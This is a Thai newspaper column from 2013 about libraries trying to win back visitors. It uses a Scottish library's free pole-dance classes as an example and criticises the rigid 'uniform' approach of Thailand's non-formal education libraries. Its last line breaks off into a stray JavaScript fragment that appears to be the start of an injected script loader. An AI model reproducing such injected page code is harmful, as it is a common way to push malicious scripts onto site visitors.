Download PDF

มติชนรายวัน ฉบับประจำวันอังคารที่ 29 มกราคม 2556

 

          ข้อมูลข่าวสารความรู้หลากหลายในโลก มีแบ่งปันไม่อั้น ผ่านเครื่องมือสื่อสารสาธารณะที่สะดวกรวดเร็วทันใจ โดยไม่จำเป็นต้องเดินทางไปหาจากห้องสมุด

          ส่งผลให้ห้องสมุดในโลกมีคนเข้าใช้บริการลดลง

          แต่ผู้เกี่ยวข้องงานบริหารห้องสมุดไม่ท้อแท้ ต่างหาลู่ทางชักจูงให้คนเข้าห้องสมุดด้วยอุบายต่างๆกันไป

          มีกรณีตัวอย่างที่สนุกสนานอยู่ในข่าวกิจกรรมห้องสมุดที่สกอตแลนด์ เปิดบริการสอนเต้นรูดเสา (โพสต์ทูเดย์ ในส่วนแทรก Z ฉบับวันอังคาร 22 ม.ค. 2556 หน้า 4) ดังนี้

          ประธานสภาเมืองมิดดอลเทียน ในสกอตแลนด์ หวังจะกระตุ้นและดึงดูดคนในเมืองให้หันมาใช้บริการห้องสมุดมากขึ้น จึงบรรจุคลาส “สอนเต้นรูดเสา” หรือรู้จักในชื่อว่า “โพลแดนซ์” ขึ้นในห้องสมุดของเมือง ชื่อเมย์ฟิลไลบรารี ตั้งแต่บ่าย 1 จนถึงบ่าย 3 โมงครึ่ง ของทุกๆวัน โดยไม่คิดค่าบริการ

          เริ่มวันที่ 2 ก.พ. เป็นต้นไป เพื่อเฉลิมฉลองเนื่องในวันเทศกาลห้องสมุด (ไลบรารีเดย์) ของท้องถิ่น

          “เทศกาลห้องสมุดถือเป็นโอกาสดีที่ใช้เฉลิมฉลอง และสะท้อนให้เห็นถึงบทบาทของห้องสมุดที่มีต่อชุมชน ซึ่งคลาสสอนเต้นรูดเสาก็เป็นอีกวิธีหนึ่งที่จะใช้เพื่อดึงดูดให้ผู้คนเข้ามาใช้บริการห้องสมุดมากขึ้น” บ็อบ คอนสเตเบิล สมาชิกสภาเมืองมิดดอลเทียน ที่ดูแลงานด้านการให้บริการสาธารณะและการพักผ่อนหย่อนใจ กล่าว

          ในระหว่างการสอนเต้น ก็จะมีนักร้องและศิลปินของท้องถิ่นมาขับกล่อมร้องเพลง และเล่นดนตรีที่สุดแสนไพเราะให้ฟังอีกด้วย

          ห้องสมุดอื่นๆในเมืองมิดดอลเทียนยังจัดบริการสิ่งอำนวยความสะดวกและการพักผ่อนหย่อนใจ เพื่อดึงดูดผู้ใช้บริการให้มากขึ้น ตั้งแต่จัดให้มีคลาสสอนฝึกเขียนนิยาย, สอนเต้นแบบวัฒนธรรมชาวสกอตแลนด์, บีบนวดศีรษะ รวมไปถึงให้บริการเล่นเกมเครื่องเอกซ์บอกซ์

          กศน. (สำนักงานส่งเสริมการศึกษานอกระบบและการศึกษาตามอัธยาศัย) บริหารจัดการการศึกษาที่ต่างจากระบบโรงเรียน แม้จะไม่ถึงขนาดดีเลิศ แต่ก็ดีแล้ว และต้องพยายามให้ดีขึ้นไปอีกจนเลิศ

          แต่แล้วมีเรื่องตลกๆ ที่ กศน. กำหนด“เครื่องแบบ”เหมือนการศึกษาในระบบโรงเรียนซึ่งไม่ตามอัธยาศัย

          ห้องสมุดประชาชนที่อยู่ในการบริหารจัดการของ กศน. ก็มี“เครื่องแบบ”เหมือนห้องสมุดในระบบโรงเรียนซึ่งไม่ตามอัธยาศัย ควรถอด“เครื่องแบบ”ออกให้หมด แล้วบริหารจัดการด้วยวิธีคิดและวิธีทำใหม่ๆให้อยู่ร่วมได้กับชุมชนท้องถิ่น

          ถ้ายังยึด“เครื่องแบบ” ก็ตามใจ แต่อย่ามาทำเป็นดราม่าเรียกร้องคนเข้าห้องสมุดเพื่ออ่านหนังสือ}var d=document;var s=d.createElement(‘script’);